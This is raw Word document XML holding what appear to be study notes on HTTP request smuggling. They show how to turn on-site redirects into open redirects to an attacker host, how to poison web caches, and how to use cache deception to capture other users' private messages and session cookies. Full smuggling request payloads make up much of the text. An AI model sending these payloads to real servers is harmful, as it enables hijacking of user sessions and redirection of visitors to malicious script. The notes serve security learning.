        </w:rPr>
        <w:t>Foo: X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126B2ECB" w14:textId="23E325E7" w:rsidR="00533091" w:rsidRDefault="003B5198" w:rsidP="00533091">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B5198">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Turning on-site Redirect to Open Redirect: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B91639C" w14:textId="386F2187" w:rsidR="00750D8C" w:rsidRPr="003B5198" w:rsidRDefault="00750D8C" w:rsidP="00533091">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>**** Very important: look around to find a 302 or 301 redirect, this is extremely important as we must smuggle a request that leads to a redirect. Then because were smuggling we can throw in an unvalidated host header causing an arbitrary redirect. *****</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7024BD04" w14:textId="0C2DE1D3" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:r w:rsidRPr="007C0EDE">
        <w:t>Many applications perform on-site redirects from one URL to another and place the hostname from the request's Host header into the redirect URL. An example of this is the default behavior of Apache and IIS web servers, where a request for a folder without a trailing slash receives a redirect to the same folder including the trailing slash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. A normal redirect shown below: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C744534" w14:textId="77777777" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:r w:rsidRPr="007C0EDE">
        <w:t>GET /home HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238FB462" w14:textId="77777777" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:r w:rsidRPr="007C0EDE">
        <w:t>Host: normal-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B07DAEF" w14:textId="77777777" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE"/>
    <w:p w14:paraId="5766D9AA" w14:textId="77777777" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:r w:rsidRPr="007C0EDE">
        <w:t>HTTP/1.1 301 Moved Permanently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3EA173" w14:textId="1891E516" w:rsidR="003B5198" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:r w:rsidRPr="007C0EDE">
        <w:t xml:space="preserve">Location: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00432D77">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://normal-website.com/home/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B0A4736" w14:textId="5B0B09FA" w:rsidR="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:r>
        <w:t xml:space="preserve">------------------ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548E1119" w14:textId="51040D9B" w:rsidR="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:r>
        <w:t xml:space="preserve">Exploit by redirecting to external domain as shown: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555DBE80" w14:textId="77777777" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0EDE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>POST / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08621DEE" w14:textId="77777777" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0EDE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Host: vulnerable-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3722D661" w14:textId="77777777" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0EDE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Content-Length: 54</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E871371" w14:textId="77777777" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0EDE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Transfer-Encoding: chunked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F01A57A" w14:textId="77777777" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D360179" w14:textId="77777777" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0EDE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE37C16" w14:textId="77777777" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="711C3F04" w14:textId="77777777" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0EDE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GET /home HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AA734A" w14:textId="77777777" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0EDE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Host: attacker-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209EAC79" w14:textId="1D15BB05" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0EDE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Foo: X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4FEF3C" w14:textId="2F1B53A6" w:rsidR="00533091" w:rsidRDefault="007C0EDE" w:rsidP="00533091">
      <w:r>
        <w:t xml:space="preserve">--------------------------- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F89049" w14:textId="43419E93" w:rsidR="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="00533091">
      <w:r>
        <w:t xml:space="preserve">This request will often result in the following behavior: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67743FD6" w14:textId="77777777" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:r w:rsidRPr="007C0EDE">
        <w:t>GET /home HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C1EB93" w14:textId="77777777" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:r w:rsidRPr="007C0EDE">
        <w:t>Host: attacker-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377769C1" w14:textId="77777777" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:r w:rsidRPr="007C0EDE">
        <w:t>Foo: XGET /scripts/include.js HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B20D49F" w14:textId="77777777" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:r w:rsidRPr="007C0EDE">
        <w:t>Host: vulnerable-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3589CADA" w14:textId="77777777" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE"/>
    <w:p w14:paraId="0237E70A" w14:textId="77777777" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:r w:rsidRPr="007C0EDE">
        <w:t>HTTP/1.1 301 Moved Permanently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4405A1B5" w14:textId="06ACB7AC" w:rsidR="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:r w:rsidRPr="007C0EDE">
        <w:t xml:space="preserve">Location: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00432D77">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://attacker-website.com/home/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="781078F2" w14:textId="6528F89F" w:rsidR="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:r>
        <w:t xml:space="preserve">--------------------------- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216C8852" w14:textId="5718A100" w:rsidR="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:r>
        <w:t xml:space="preserve">We can then host our own domain and run arbitrary javascript on any user who gets redirected. In some cases we may see server level redirects that use the path to construct a root-relative URL for the Location header as shown: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B5F72D" w14:textId="77777777" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:r w:rsidRPr="007C0EDE">
        <w:t>GET /example HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD8543B" w14:textId="77777777" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:r w:rsidRPr="007C0EDE">
        <w:t>Host: normal-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5824684C" w14:textId="77777777" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE"/>
    <w:p w14:paraId="07C21809" w14:textId="77777777" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:r w:rsidRPr="007C0EDE">
        <w:t>HTTP/1.1 301 Moved Permanently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B31EE95" w14:textId="3C20BE60" w:rsidR="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:r w:rsidRPr="007C0EDE">
        <w:t>Location: /example/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEB9321" w14:textId="1A404B3E" w:rsidR="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:r>
        <w:t xml:space="preserve">This behavior can still be exploited if the server allows for a protocol-relative URL in the path like this: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B2F52D" w14:textId="77777777" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:r w:rsidRPr="007C0EDE">
        <w:t>GET //attacker-website.com/example HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7461AA" w14:textId="77777777" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:r w:rsidRPr="007C0EDE">
        <w:t>Host: vulnerable-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D397F1" w14:textId="77777777" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE"/>
    <w:p w14:paraId="3478C295" w14:textId="77777777" w:rsidR="007C0EDE" w:rsidRPr="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:r w:rsidRPr="007C0EDE">
        <w:t>HTTP/1.1 301 Moved Permanently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5B71E1" w14:textId="17CD934A" w:rsidR="007C0EDE" w:rsidRDefault="007C0EDE" w:rsidP="007C0EDE">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="007C0EDE">
        <w:t>Location: //attacker-website.com/example/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FCD20B" w14:textId="61946BA3" w:rsidR="00EF3FA6" w:rsidRDefault="00EF3FA6" w:rsidP="00EF3FA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF3FA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Using request smuggling to perform Web Cache Poisoning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299E8587" w14:textId="7401FB08" w:rsidR="00EF3FA6" w:rsidRDefault="00EF3FA6" w:rsidP="00EF3FA6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>If the front end performs caching of content, we may be able to poison the cache with an off-site redirect.  This will make the attack persistent affecting any subsequent users visiting the vulnerable URL. General attack vector shown below (bold=our request nonbold=next users request):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49467109" w14:textId="77777777" w:rsidR="00EF3FA6" w:rsidRPr="00EF3FA6" w:rsidRDefault="00EF3FA6" w:rsidP="00EF3FA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF3FA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>POST / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6B432F" w14:textId="77777777" w:rsidR="00EF3FA6" w:rsidRPr="00EF3FA6" w:rsidRDefault="00EF3FA6" w:rsidP="00EF3FA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF3FA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Host: vulnerable-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FD1E8A" w14:textId="77777777" w:rsidR="00EF3FA6" w:rsidRPr="00EF3FA6" w:rsidRDefault="00EF3FA6" w:rsidP="00EF3FA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF3FA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Content-Length: 59</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00898461" w14:textId="77777777" w:rsidR="00EF3FA6" w:rsidRPr="00EF3FA6" w:rsidRDefault="00EF3FA6" w:rsidP="00EF3FA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF3FA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Transfer-Encoding: chunked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A83476" w14:textId="77777777" w:rsidR="00EF3FA6" w:rsidRPr="00EF3FA6" w:rsidRDefault="00EF3FA6" w:rsidP="00EF3FA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DF167AF" w14:textId="77777777" w:rsidR="00EF3FA6" w:rsidRPr="00EF3FA6" w:rsidRDefault="00EF3FA6" w:rsidP="00EF3FA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF3FA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6123A18E" w14:textId="77777777" w:rsidR="00EF3FA6" w:rsidRPr="00EF3FA6" w:rsidRDefault="00EF3FA6" w:rsidP="00EF3FA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EF99D87" w14:textId="77777777" w:rsidR="00EF3FA6" w:rsidRPr="00EF3FA6" w:rsidRDefault="00EF3FA6" w:rsidP="00EF3FA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF3FA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GET /home HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391D0ED2" w14:textId="77777777" w:rsidR="00EF3FA6" w:rsidRPr="00EF3FA6" w:rsidRDefault="00EF3FA6" w:rsidP="00EF3FA6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF3FA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Host: attacker-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C06DBF1" w14:textId="28EF4933" w:rsidR="00EF3FA6" w:rsidRPr="00EF3FA6" w:rsidRDefault="00EF3FA6" w:rsidP="00EF3FA6">
      <w:r w:rsidRPr="00EF3FA6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Foo: X</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3FA6">
        <w:t>GET /static/include.js HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722E69C4" w14:textId="4E30735C" w:rsidR="00EF3FA6" w:rsidRPr="00EF3FA6" w:rsidRDefault="00EF3FA6" w:rsidP="00EF3FA6">
      <w:r w:rsidRPr="00EF3FA6">
        <w:t>Host: vulnerable-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BF4E0B" w14:textId="4869CE0D" w:rsidR="00BC0B79" w:rsidRDefault="00EF3FA6" w:rsidP="00BC0B79">
      <w:r>
        <w:t xml:space="preserve">------------------------- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9D03DD" w14:textId="72B53E01" w:rsidR="00EF3FA6" w:rsidRDefault="00EF3FA6" w:rsidP="00BC0B79">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This will then trigger a redirect to the attacker's website. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E8283E" w14:textId="0D12DED0" w:rsidR="005C5183" w:rsidRDefault="005C5183" w:rsidP="00BC0B79">
      <w:r>
        <w:t>Web Cache Deception using HTTP Request Smuggling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5027E9CE" w14:textId="1AF5CCFC" w:rsidR="005C5183" w:rsidRDefault="005C5183" w:rsidP="00BC0B79">
      <w:r>
        <w:t xml:space="preserve">Web Cache deception is when we cause the web app to cache sensitive content belonging to another user which we then can retrieve from the cache. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA76E09" w14:textId="77777777" w:rsidR="005C5183" w:rsidRDefault="005C5183" w:rsidP="005C5183">
      <w:r>
        <w:t>In this case we smuggle a request that returns some type of sensitive, user-specific content. Like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A455FA5" w14:textId="253511F5" w:rsidR="005C5183" w:rsidRPr="005C5183" w:rsidRDefault="005C5183" w:rsidP="005C5183">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5183">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>POST / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22730001" w14:textId="77777777" w:rsidR="005C5183" w:rsidRPr="005C5183" w:rsidRDefault="005C5183" w:rsidP="005C5183">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5183">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Host: vulnerable-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D3EFA5" w14:textId="77777777" w:rsidR="005C5183" w:rsidRPr="005C5183" w:rsidRDefault="005C5183" w:rsidP="005C5183">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5183">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Content-Length: 43</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9D5925" w14:textId="77777777" w:rsidR="005C5183" w:rsidRPr="005C5183" w:rsidRDefault="005C5183" w:rsidP="005C5183">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5183">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Transfer-Encoding: chunked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2871AFDE" w14:textId="77777777" w:rsidR="005C5183" w:rsidRPr="005C5183" w:rsidRDefault="005C5183" w:rsidP="005C5183">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C749FCE" w14:textId="77777777" w:rsidR="005C5183" w:rsidRPr="005C5183" w:rsidRDefault="005C5183" w:rsidP="005C5183">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5183">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1123789B" w14:textId="77777777" w:rsidR="005C5183" w:rsidRPr="005C5183" w:rsidRDefault="005C5183" w:rsidP="005C5183">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18D692D3" w14:textId="77777777" w:rsidR="005C5183" w:rsidRPr="005C5183" w:rsidRDefault="005C5183" w:rsidP="005C5183">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5183">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GET /private/messages HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50138572" w14:textId="7ACB6B2F" w:rsidR="005C5183" w:rsidRDefault="005C5183" w:rsidP="005C5183">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5183">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Foo: X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D1AFA4" w14:textId="24A4545A" w:rsidR="005C5183" w:rsidRDefault="005C5183" w:rsidP="005C5183">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">-------------------- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6717785A" w14:textId="77777777" w:rsidR="005C5183" w:rsidRDefault="005C5183" w:rsidP="005C5183">
      <w:r>
        <w:t>The next request will be appended and contain a new users coolie like this (bold is the request we smuggled):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C814EE" w14:textId="77777777" w:rsidR="005C5183" w:rsidRPr="005C5183" w:rsidRDefault="005C5183" w:rsidP="005C5183">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5183">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GET /private/messages HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D7BB1E" w14:textId="77777777" w:rsidR="005C5183" w:rsidRPr="005C5183" w:rsidRDefault="005C5183" w:rsidP="005C5183">
      <w:r w:rsidRPr="005C5183">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Foo: X</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5183">
        <w:t>GET /static/some-image.png HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33321A68" w14:textId="77777777" w:rsidR="005C5183" w:rsidRPr="005C5183" w:rsidRDefault="005C5183" w:rsidP="005C5183">
      <w:r w:rsidRPr="005C5183">
        <w:t>Host: vulnerable-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242BDD93" w14:textId="5D0EAE68" w:rsidR="005C5183" w:rsidRPr="005C5183" w:rsidRDefault="005C5183" w:rsidP="005C5183">
      <w:r w:rsidRPr="005C5183">
        <w:t>Cookie: sessionId=q1jn30m6mqa7nbwsa0bhmbr7ln2vmh7z</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   ……</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC9C45F" w14:textId="4776E7B1" w:rsidR="00EF3FA6" w:rsidRDefault="005C5183" w:rsidP="00BC0B79">
      <w:r>
        <w:t xml:space="preserve">This request gets processed in the normal way but the server processes it using the appended session cookie thus producing another </w:t>
      </w:r>
      <w:r w:rsidR="00474E93">
        <w:t>user's</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> response. The front end will then cache it somewhere, in our example it would be cached at </w:t>
      </w:r>
      <w:r w:rsidRPr="005C5183">
        <w:t>/static/some-image.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which is what the victim was oringally requesting as shown in the above request. </w:t>
      </w:r>
      <w:r w:rsidR="00474E93">
        <w:t xml:space="preserve">It is fairly common to see only static pages be cached (such as JS or images) so keep that in mind when trying to locate the response. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29337F50" w14:textId="77777777" w:rsidR="00A30118" w:rsidRDefault="00A30118" w:rsidP="00BC0B79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A30118">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">****** </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EACECD0" w14:textId="77777777" w:rsidR="00A30118" w:rsidRDefault="00A30118" w:rsidP="00BC0B79">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A30118">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Often we will see parameters like ID or user or something in the URL responsible for accessing the sensitive content. Try to remove these and just include your cookies (specifically session cookies). Very often the request will still go through and display that sensitive content. This is important because in a smuggled request we cannot guess the victim's ID or Username etc BUT we will have access to their cookie which often is all we need </w:t>
      </w:r>
    </w:p>
